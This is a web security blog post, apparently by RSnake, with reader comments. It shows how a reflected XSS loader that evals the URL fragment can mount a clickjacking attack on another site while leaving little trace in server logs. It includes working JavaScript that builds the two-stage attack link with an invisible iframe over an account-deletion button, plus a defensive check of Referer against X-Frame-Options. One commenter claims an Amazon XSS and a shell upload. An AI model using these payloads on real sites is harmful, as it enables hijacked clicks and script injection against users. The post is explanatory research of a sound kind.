web application security lab

Turning XSS into Clickjacking

Those of us who do a lot of work in the security world have come to realize that there is a ton of cross site scripting (XSS) out there: 80% of dynamic sites (or more) suffer from it. But how many sites, by comparison, let you upload arbitrary HTML? Far fewer, and the ones that do typically require some sort of login first, so the set of people who could abuse an HTML upload on any given site is small. Yet a page the attacker controls is precisely what’s needed to mount a clickjacking attack (usually one or two pages that frame the target). Without one, the attacker has to rent space in the cloud with a stolen credit card, or find some parasitic hosting somewhere.

That’s when I got to thinking… how can you use any old generic reflected XSS to mount a clickjacking attack? A few hours later I had a prototype that worked. Here’s how the attack works. Let’s say a parameter like “search” is vulnerable to reflected XSS. An attacker could send the victim a link like:

http://example.com/?search=<script>eval(location.hash.slice(1))</script>

This is an old trick: whatever follows the # in the URL (the fragment, which location.hash exposes) is what gets executed. The fragment is never sent to the server; it exists only on the client. So this effectively turns the reflected XSS into a DOM based XSS, which incidentally also leaves less of a signature on the server, since only the short generic loader shows up in the logs and the real payload never appears in the request. The attacker’s fragment payload would then look something like this (the prototype payload works only in Firefox):
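
As an added example that is not the payload from the original post, here is how the two stages fit together, written for Node so the resulting link can be built and inspected offline. example.com, victim.com, the “search” parameter, the decoy position and the button coordinates are all assumptions; the loader also differs slightly from the post’s eval(location.hash.slice(1)) in that it decodes the fragment before evaluating it.

```javascript
// Added example, not code from the original post. It assembles the two-stage
// link: a short reflected-XSS loader in the query string and the real
// clickjacking payload in the fragment. The host names, the "search"
// parameter, the decoy position and the button coordinates are assumptions
// made up for illustration.

// Stage 1: the only thing the server ever sees. It runs whatever follows the
// "#" in the URL. decodeURIComponent() is a variation on the post's
// eval(location.hash.slice(1)) so the loader does not depend on whether the
// browser hands back the fragment already decoded (browsers have differed).
const STAGE1 = '<script>eval(decodeURIComponent(location.hash.slice(1)))</script>';

// Stage 2: the clickjacking overlay, executed on example.com by stage 1.
// A visible decoy is drawn at (decoyX, decoyY); victim.com is loaded in a
// transparent iframe shifted so that the control at (buttonX, buttonY)
// inside the framed page sits exactly under the decoy. The iframe is on top
// (z-index), so the click lands on victim.com, not on the decoy.
function buildOverlayPayload(targetUrl, buttonX, buttonY, decoyX, decoyY) {
  const left = decoyX - buttonX;
  const top = decoyY - buttonY;
  return [
    'var d=document;d.body.innerHTML="";',
    'var b=d.createElement("div");b.textContent="Click here to continue";',
    'b.style.cssText="position:absolute;left:' + decoyX + 'px;top:' + decoyY +
      'px;padding:20px;border:1px solid #000;";',
    'var f=d.createElement("iframe");f.src=' + JSON.stringify(targetUrl) + ';',
    'f.style.cssText="position:absolute;left:' + left + 'px;top:' + top +
      'px;width:1200px;height:1200px;border:0;opacity:0;z-index:2;";',
    'd.body.appendChild(b);d.body.appendChild(f);'
  ].join('');
}

// Put the two stages into one URL. URLSearchParams percent-encodes the
// loader; the fragment is percent-encoded as well so that quotes, spaces
// and "%" inside the payload round-trip intact.
function buildAttackUrl(vulnerableUrl, paramName, loader, payload) {
  const u = new URL(vulnerableUrl);
  u.searchParams.set(paramName, loader);
  u.hash = encodeURIComponent(payload);
  return u.toString();
}

// What the browser actually puts on the wire: path and query only. The
// fragment, and therefore the clickjacking code, never leaves the client.
function serverVisiblePart(attackUrl) {
  const u = new URL(attackUrl);
  return u.pathname + u.search;
}

// What stage 1 will eval on the client, recovered from the fragment.
function clientSidePayload(attackUrl) {
  return decodeURIComponent(new URL(attackUrl).hash.slice(1));
}

// Assumed target: a button at (640, 480) inside victim.com's page, to be
// placed under a decoy drawn at (100, 100) on the XSS'd example.com page.
const overlay = buildOverlayPayload('http://victim.com/account/delete', 640, 480, 100, 100);
const link = buildAttackUrl('http://example.com/', 'search', STAGE1, overlay);
console.log('link:   ' + link);
console.log('server: ' + serverVisiblePart(link));
console.log('client: ' + clientSidePayload(link));
```

The overlay only works if victim.com can be framed at all, i.e. it sends no X-Frame-Options header and runs no frame-busting script; the request that example.com logs contains nothing but the loader, and the Referer that victim.com receives for the frame load comes from example.com, fragment stripped.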

So you have a reflected XSS on example.com that bootstraps a DOM based XSS, which in turn mounts a clickjacking attack against victim.com, without the attacker hosting a single page. Obviously you’d need to adjust the coordinates to fit the target page and make it work in other browsers, but this could easily be used to leverage the attack in situations where an attacker might not otherwise be able to. For instance, if victim.com’s clickjacking defense only checks the referrer, and the XSS lives on the correct domain (just a different sub-domain), the framing page now arrives with an acceptable referrer and the check is bypassed, and so on. Anyway, I thought some people might find this interesting. Happy penetration testing!
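
The referrer remark above, as an added example that is not part of the original post: a referrer-only framing check beside the check the XSS cannot satisfy. victim.com, its sub-domains and the policy values are assumptions, and the X-Frame-Options logic is a simplified model of what browsers enforce.

```javascript
// Added example, not code from the original post. victim.com and its
// sub-domains are assumptions; xfoAllowsFraming() is a simplified model of
// browser X-Frame-Options enforcement, not any browser's actual code.

// Weak defence: victim.com serves its page for framing whenever the Referer
// host is victim.com or one of its sub-domains. A reflected XSS on any
// sub-domain yields a framing page that passes this test, because the
// Referer is the URL of the XSS'd page (fragment stripped).
function refererCheckAllowsFraming(referer) {
  if (!referer) return false;
  const host = new URL(referer).hostname;
  return host === 'victim.com' || host.endsWith('.victim.com');
}

// Stronger defence: the browser enforces X-Frame-Options sent by victim.com
// against the origin of the top-level page doing the framing. Origins are
// compared whole (scheme, host, port), so a different sub-domain is a
// different origin and SAMEORIGIN blocks it regardless of the Referer.
function xfoAllowsFraming(topLevelUrl, framedUrl, xfoHeader) {
  const top = new URL(topLevelUrl).origin;
  const framed = new URL(framedUrl).origin;
  switch ((xfoHeader || '').trim().toUpperCase()) {
    case 'DENY':
      return false;
    case 'SAMEORIGIN':
      return top === framed;
    default:
      // Header absent or unrecognised: the browser does not block.
      return true;
  }
}

// Assumed scenario: XSS on xss.victim.com framing www.victim.com.
const xssPage = 'http://xss.victim.com/?search=%3Cscript%3E...%3C%2Fscript%3E';
const target = 'http://www.victim.com/account/delete';
console.log('referer check lets the XSS page frame:', refererCheckAllowsFraming(xssPage));
console.log('SAMEORIGIN lets the XSS page frame:   ', xfoAllowsFraming(xssPage, target, 'SAMEORIGIN'));
```

Early SAMEORIGIN implementations compared only the top-level document, not every intermediate frame, so a page that can be framed by a same-origin intermediary needs DENY (or, today, a frame-ancestors directive); the point here is only that an origin comparison is not satisfied by a sibling sub-domain, whereas a domain-suffix check on the Referer is.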

10 Responses to “Turning XSS into Clickjacking”

  1. WADR Says:

    RSnake, with all due respect, this is almost the most stupid attack I’ve ever seen (there are actually a couple that are worse than this).

    This is just my opinion, but it seems that you are slowly transforming into MustLive with every new post you put up.

    I acknowledge there was a time when you posted interesting stuff, but this last couple of posts are just retarded.

    Take it as constructive criticism, If you don’t want to moderate-approve this post I’m cool with it. This post is more for you than for your readers.

  2. RSnake Says:

    @WADR - I appreciate the unsolicited feedback. If there is something specifically you’d like to see though, that would be infinitely more helpful.

    Others do disagree with you though, and that’s reason enough for me to publish what admittedly amounts to a few hours of research. And yes, there are a lot of dumb attacks out there, it doesn’t mean they shouldn’t be mentioned, if they work. And I respectfully disagree that the attack is stupid. Clickjacking has actually been used in over a dozen worms now. This only modifies the delivery mechanism, it doesn’t create a new (dumb) attack.

    Lastly, and I mean this in the nicest possible way - you are welcome to read other blogs, no one is forcing you to read this one. I started this site for myself to iterate my own thoughts, not to placate the masses.

  3. daphiel Says:

    Any attack/vulnerability is welcome. I think there are a few people who don’t know all these things… For work purposes and other reasons, many IT security managers and analysts cannot read all the posts about every dumb (or not) vuln around the web.

  4. RSnake Says:

    @daphiel - thank you. I appreciate that!

  5. RSnake Says:

    Posted for Tom T who got caught in the spam filter:

    @ WADR: “Ad hominem” attacks (attacks against the person, with name-calling like “stupid”) without specific facts are meaningless, illogical, and troll-ish. If you have flaws to point out in the attack, I know that RSnake welcomes you to post them. If you can’t point to specific flaws, or otherwise explain what is “stupid” about the attack, don’t waste the bandwidth, server capacity, and disk space. This goes for your opinion of the “trend”, as well. Cite specific examples, or don’t post.

    @ RSnake: Please keep iterating your thoughts, without worrying about placating the masses. (FWIW, *pissing off* the masses is often a sign that you’ve struck a nerve, i.e., made a very telling point.) And I agree that any attack that works, even in only a few cases, isn’t “stupid”. If it works, someone, somewhere, will use it against someone else, somewhere else, so it needs to be discussed, and a defense implemented.

    I and many others find many of your thoughts interesting, regardless of whether we respond, and as you said, we’re all free not to read or respond to the ones we find uninteresting.

  6. TheLightCosine Says:

    Amen, Tom T.
    RSnake, I always look forward to reading your posts.
    However, I would make a request since you opened that door. I’d love to see some posts about methodology rather than specific technical details. Don’t stop the technical details, mind you, just some posts on your actual testing methodologies would be very interesting and helpful. We are still working on developing our own AppSec program at my work, and I find it challenging to create a cohesive, repeatable, and formal testing process.

  7. niver Says:

    Rsnake,

    Have you had a chance to take a look at :

    http://www.contextis.co.uk/resources/tools/clickjacking-tool/

    Interested to know your thoughts? There don’t seem to be many more public tools for clickjacking PoCs?

    niver

  8. Ph33r Says:

    And here’s another bug that I’ve found in Amazon:

    http://www.amazon.com/script-alert-product-document-cookie/dp/B003H7775E/ref=sr_1_3?s=gateway&ie=UTF8&qid=1285870078&sr=8-3

    And it’s stored on the server and opened a new DIR /script-alert-product-document-cookie/

    I believe that xss can achieve more than what’s it’s been given..

    Mad respect

  9. Ph33r Says:

    Sorry RSnake about posting back a lot, but after trying to figure out the way it works, I guess I didn’t find out the way it worked.

    let’s have a look..

    http://www.amazon.com/No-Money-Low-Start-Business/dp/1448631599/ref=sr_1_2?s=gateway&ie=UTF8&qid=1285391121&sr=8-2

    Normal link to a book

    Now lets edit one section and it’s /dp/1448631599/

    replace /1448631599/ with /B003H7775E/

    then it’ll be like this

    http://www.amazon.com/No-Money-Low-Start-Business/dp/B003H7775E/ref=sr_1_2?s=gateway&ie=UTF8&qid=1285391121&sr=8-2

    And it responds back the same way =]

  10. Ph33r Says:

    Shell is uploaded via this issue =]